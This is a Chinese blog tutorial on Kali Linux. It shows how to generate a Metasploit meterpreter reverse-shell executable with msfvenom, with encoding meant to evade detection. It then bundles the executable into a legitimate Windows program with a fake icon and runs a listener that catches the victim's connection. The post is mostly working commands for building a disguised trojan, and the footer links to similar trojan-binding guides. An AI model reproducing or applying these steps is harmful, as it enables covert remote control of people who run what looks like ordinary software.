kali-捆绑应用程序

已于 2023-12-19 17:17:09 修改
阅读量657 收藏 12
点赞数 7
分类专栏: 玩转Kali 文章标签: go
于 2023-12-19 17:14:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18931093/article/details/135089557
版权

文章目录


操作环境

kali

windows

一、安装开发环境

┌──(kali㉿kali)-[~]
└─$ sudo -i
[sudo] kali 的密码:
                     
┌──(root㉿kali)-[~]
└─# whoami            
root

┌──(root㉿kali)-[~]
└─# apt update                                                  
                                                                             
┌──(root㉿kali)-[~]
└─# apt -y install golang

使用 msfvenom 生成 msf 程序

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp  LHOST=192.168.64.129 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 11 -f exe -o msf.exe

参数说明:

-a 指定架构如 x86 x64。 x86 代表 32 位, x64 代表 64 位

–platform 指定平台,这里选择 windows,通过 --l platforms 可以查看所有支持的平台

-p 设置载荷,我们使用 windows/meterpreter/reverse_tcp,可以通过-l payloads 查看所有载荷

LHOST 目标主机执行程序后连接我们 Kali 的地址

LPORT 目标主机执行程序后连接我们 Kali 的端口

-b 去掉坏字符,坏字符会影响 payload 正常执行。

-e 指定编码器,x86/shikata_ga_nai 是 msf 自带的编码器,可以通过 -l encoders 查看所有编码器

-i 指定 payload 有效载荷编码迭代次数。

-f 指定生成格式,可以是 raw,exe,elf,jar,c 语言的,python 的,java 的……,用 -l formats 查看所有支持的格式

-o 指定文件名称和导出位置

准备完成以下材料

┌──(root㉿kali)-[~]
└─# ls
1.ico superdic-cr.exe binding  msf.exe

二、开始捆绑

#增加执行权限
┌──(root㉿kali)-[~]
└─# chmod +x binding
#注:第一个参数    msf.exe 为生成程序,第二个参数   superdic-cr.exe 为我们要捆绑的应用,第 三个参数    1.ico 是 ico 图标。
┌──(root㉿kali)-[~]
└─# ./binding msf.exe superdic-cr.exe 1.ico

┌──(root㉿kali)-[/home/kali]
└─# cd output       

┌──(root㉿kali)-[/home/kali/output]
└─# ls
payload.exe
#下载生成文件到本地
┌──(root㉿kali)-[/home/kali/output]
└─# sz output/payload.exe

三、开始监听

┌──(root㉿kali)-[/home/kali/output]
└─# msfdb run
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.64.129
msf6 exploit(multi/handler) > set lport 4444 
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.64.129:4444

windows运行payload.exe,出现了之前捆绑的文件

在这里插入图片描述

另一个文件

!在这里插入图片描述

回到Kali,监听到了用户机

在这里插入图片描述

睡不着乌托托
关注
  • 7
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Kali [CobaltStrike]CS神器
weixin_45253622的博客
03-24 7448
CobaltStrike的使用 CobaltStrike是一款渗透测试神器,被业界人称为CS神器。CobaltSitrike分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。 CobaliStrike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,windows exe木马生成,windows dll木马生成,java木马生成,office宏病毒生成,木马捆绑。钓鱼攻击包括:站点克隆,目标信息获取,java 执行,浏览器自动攻击等等强大的功能! ......
Kali渗透全方位实战】使用Nmap进行端口探测-发现脆弱站点
李响
03-15 1147
文章目录1 摘要2 Nmap作用3 常用Nmap扫描指令4 端口扫描状态5 TCP/IP协议与Http协议的区别6 使用Nmap探测目标开放端口 1 摘要 一 端口是个网络应用中很重要的东西,相当于“门”。 二 什么是端口 端口在计算机网络中是个非常重要的概念,他不是硬件,不同于计算机中的插槽,可以说是个软插槽。如果有需要,一台计算机中可以由上万个端口。 端口是由计算通信协议TCP/IP协...
kali】生成木马并绑定正常软件实现远控
qq_20410657的博客
10-20 846
如果没有则需要进行安装。
kali linux捆绑工具shellter的安装及使用
wkend的博客
03-16 1万+
kali linux捆绑工具shellter的安装及使用 按图所示输入命令 2.输入shellter,出现下图所示表示安装成功 shellter的使用 1.从浏览器下载putty,并且剪切到home目录下 2.在这里提示有三种操作模式 - A:自动 - M:管理者,高级模式 - H:帮助选项 在这里我们输入A,选择自动模式 3.输入pe t...
kali 查看已经打开的程序_powershell后门绑定py表白程序
weixin_33212799的博客
12-28 157
人生一世,草木一秋 —— 冯梦龙思路:用python写一个表白程序表白程序运行的同时调用系统命令执行我们有后门的powershell代码从而控制对方的主机至于powershell后门代码的制作这里不再赘述,参考powershell攻击思路frp内网穿透参考frp内网穿透道理大家都懂,咋们开始实操奈何笔者python水平马马虎虎,借用csdn大佬的代码走一波代码地址https://blog.csdn...
渗透测试 --- 方法论
daibaohui的博客
02-21 1079
渗透测试(penetration testing,pentest)是实施安全评估(即审计)的具体手段。方法论是在制定、实施信息安全审计方案时,需要遵循的规则、惯例和过程。人们在评估网络、应用、系统或三者组合的安全状况时,不断摸索各种务实的理念和成熟的做法,并总结出了一套理论——测试方法论。本章简要介绍了渗透测试方法论的各关键要点,涉及的主题包括: ● 两种广为认知的渗透测试类型——黑盒测试和白盒测试; ● 漏洞评估和渗透测试的区别; ● 业界普遍采纳的安全测试方法论,以及其核心功能、特征和优势; ●
网络安全工程师教你:如何掌握Kali Linux的Metasploit
10-02
一、适合人群:本课程适合兴趣计算机与网络安全技术的学员观看学习二、课程目标:学习和掌握Kali Linux的Metasploit测试框架三、课程简介:1、Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。每一季度更新一次。由Offensive Security Ltd维护和资助。起先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的用于取证的Linux发行版 。 2、Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
Portal-Akademik-Ponpes-Pabelan:Web应用程序开发的主要任务(Pabelan伊斯兰寄宿学校学术门户)
05-16
这是一个小组存储库,用于完成万隆Sunan Gunung Djati国立伊斯兰大学的Web应用程序开发过程中的重要任务。 安装及使用 演示 从此存储库下载ZIP文件。 或在命令行中输入: git clone ...
react-test:测试React untuk pertama kali
02-13
在开发模式下运行应用程序。 打开在浏览器中查看。 如果进行编辑,页面将重新加载。 您还将在控制台中看到任何棉绒错误。 npm test 在交互式监视模式下启动测试运行程序。 有关更多信息,请参见关于的部分。 npm ...
最新kali之curl(二)
vanony的博客
01-23 831
描述:   传送网址。   curl是一个工具,使用支持的协议(DICT、FILE、FTP、FTPS、GOPHER、HTTP、HTTPS、IMAP、IMAPS、LDAP、LDAPS、MQTT、POP3、POP3S、RTMP、RTMPS、RTSP、SCP、SFTP、SMB、SMBS、SMTP、SMTPS、TELNET和TFTP)从服务器传输数据。该命令被设计为无需用户交互即可工作。   curl提供了大量有用的技巧,如代理支持、用户身份验证、FTP上传、HTTP post、SSL连接、cookie、文件传输恢
superdic.exe
04-03
易游软件--超级字典生成器v3.2。与博主的博文搭配使用效果更好喔。
Kali利用MSF渗透安卓手机
weixin_51641247的博客
03-29 5825
利用Kali渗透安卓手机; MSF是一个综合性渗透测试工具,集成信息收集、漏洞扫描、漏洞利用以及提权等功能的工具
Kalikali主要工具使用说明(文末附超全思维导图)
热门推荐
PP_zi的博客
05-11 4万+
本文为《从实践中学习Kali Linux渗透测试》总结笔记,仅供学习使用,禁止用于非法用途,转载请附上原文链接! 1. 信息收集 1.1 发现主机 traceroute 获取目标主机的路由条目,确定网络拓扑。每一跳表示一个网关,星号可能为防火墙导致。 1.1.1 扫描主机 ① nmap nmap -sP ip/ip段 对目标主机实施ping扫描,探测主机是否在线 也可以通过其他语法,扫描主机开放端口、使用的操作系统等 ② Netdiscover ARP侦查工具,可以扫描IP地址,检查在线主机。 .
注册机捆绑恶意程序(无免杀)
m0_65764670的博客
05-21 468
kali中需具备binding和需捆绑程序或者其他东西这里是crt和win10(win10需要关闭安全程序)八、运行程序(运行时两个程序会分开原本为46个,现在为47个msf文件会在后台运行不会直接显示)注:exe本身不可以去掉因为这本就为exe文件,去掉了文件将会被更改。六、下载到目标主机,记得伪装(捆绑程序为正常工具和msf的合体)注:每个更新方式都会有不同的影响,建议使用覆盖或者跳过。注:这里将所有图片名字都进行了更改,因此图片会打不开。打开程序(这里打开了计算器)1、准备一张图片和恶意程序
Kali Linux渗透测试基础入门到进阶实战全程课
09-29
课程标题:Kali Linux渗透测试基础入门到进阶实战全程课一、课程声明       本课程所有分享仅做学习交流,切勿用于任何不法用途,请每位学员自觉遵守网络安全法等法律法规!二、课程概要       本课程主要分享Kali Linux渗透测试基础入门到进阶实战全程技巧!三、适合人员       1、零基础大学生       2、IT技术人员       3、运维工程师       4、渗透测试工程师       5、漏洞挖掘工程师四、特别说明       1、本课程支持一次购买,永久观看!       2、本课系讲师原创课程,请勿盗用!
Kali Linux渗透测试实战:Msfvenom木马生成与攻防实战教程
08-19
1、课程概要       本课程主要分享Kali Linux渗透测试实战:Msfvenom生成木马攻防实战教程! 2、课程目标         本课程致力于帮助广大学员掌握Msfvenom木马生成与攻防实战技巧! 3、适合人员        本课程适合兴趣计算机与网络安全技术的学员观看学习! 4、特别说明        本课程支持一次购买,永久观看,请广大学员们放心选购!
kali安卓手机木马远控
m0_65606241的博客
05-06 1万+
得到kali本机IP,设置端口 利用msf payload模块生成木马 命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.174.129 lport=5555 R > 1.apk 木马生成后 开启我们的监听模块msfconsole 进入控制端后,设置一个安卓的playload(之前使用过的) 设置监听kali虚拟机的ip地址和端口号(与之前生成apk木马文件的命令参数相同) run启用,等待木马..
msfvenom捆绑/制作木马程序
qq_45740212的博客
01-28 4280
msfvenom捆绑/制作木马程序,并用Kali实现监听
wsl --install -d kali-linuxkali-linux d:\WSL\kali.tar
最新发布
06-11
您提到的命令是用于在Windows Subsystem for Linux (WSL)中安装Kali Linux发行版。`wsl --install -d kali-linux` 是Windows命令行中的一项操作,`-d` 参数后面跟的是你要安装的Linux发行版的名称或URL,这里是 `kali-linux`,`kali.tar` 通常是指一个预先打包好的Kali Linux镜像文件。 具体步骤如下: 1. 首先,确保你的系统已经安装了WSL,可以在控制面板或设置中检查。 2. 如果你有Kali Linux的`.tar` 包(压缩格式),将其解压到一个本地目录,如 `D:\WSL\`。 3. 使用提供的命令 `wsl --install -d D:\WSL\kali.tar` 或者 `wsl --install -d kali-linux`(如果`.tar` 文件直接放在了指定路径)。 4. 运行该命令后,Windows会自动解压并安装Kali Linux到WSL环境中。 5. 安装可能需要一些时间,完成后你需要通过 `wsl` 命令或者WSL启动器打开新安装的Kali Linux。 相关问题: 1. 如何检查我的系统是否支持WSL? 2. WSL支持哪些常见的Linux发行版? 3. 如何在WSL中管理和切换不同的Linux发行版?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

睡不着乌托托

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值